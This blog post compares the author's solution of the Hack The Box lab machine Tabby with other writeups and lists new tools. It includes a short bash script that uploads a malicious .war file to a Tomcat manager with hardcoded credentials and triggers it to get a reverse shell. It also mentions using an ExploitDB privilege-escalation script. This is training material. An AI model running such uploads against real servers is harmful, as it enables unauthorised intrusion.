Sign in Subscribe
htb

Learning day part 3: Reading other HTB writeups -- Tabby, and finding new tools

DanielxBlack

2 min read

I once received some advice from a dude who is pretty good at this kind of stuff to read other writeups once I've solved a box. This will help because you will discover other techniques you didn't think about or know about.

I'm going to do that right now with Tabby and see if I find some differences in how I solved it vs how others solved it.

Installing Tomcat on your own machine to find the relevant file

When I worked through the box, I wasted a ton of time trying to figure out where this file was.

I called it the trickiest part of the box on my writeup.

This dude on his Medium blog installed Tomcat 9 locally and figured out where the file he was looking for was hosted. This enabled him to get what he needed.

Good thing to keep in mind, but such a drag to have to do when running through a CTF-like challenge. That said, it would have probably taken me less time to install the software and figure out where the file is than it ended up taking for me to guess my way through and fight through Google searches that didn't always turn up the info I was hoping for.

Uploading the .war file

The other writeups I saw did this manually with curl. I wrote a small one-liner that uploaded the file and then ran a second curl GET request to activate it and give me my reverse shell as long as I had my listener running.

I called it upyours.sh:

#! /bin/bash

user=tomcat
pass=\$3cureP4s5w0rd123!

curl -T "meow.war" -u $user:$pass "http://10.10.10.194:8080/manager/text/deploy?path=/myapp&update=true" && curl -X GET http://10.10.10.194:8080/myapp/

Downloading the relevant file

I saw mentions of downloading the relevant .zip file, but didn't see how to do it. I just set up an FTP server that I upload the file to from the victim machine. The FTP server is on my local machine. I just stop the service when I'm done with the upload.

Getting Root

The guides I found used this step-by-step from HackTricks. I went the skid route and used a script that did most of it for me. Found it here, ExploitDB, of course.

The process is similar, but I didn't have to run as many commands. It may be worth revisiting so I can try it manually as well.

New tools

Didn't find any walkthrough that did it drastically different than what I did. That said, I did find a tool called Final Recon on this blog. Basically, they were promoting his own tool, but still cool. I might give it a try.

Their .war file uploader also kicks my file uploader's butt. It's called WARSend. I still like the name upyours.sh better, though.

Sign up for more like this.

Enter your email
Subscribe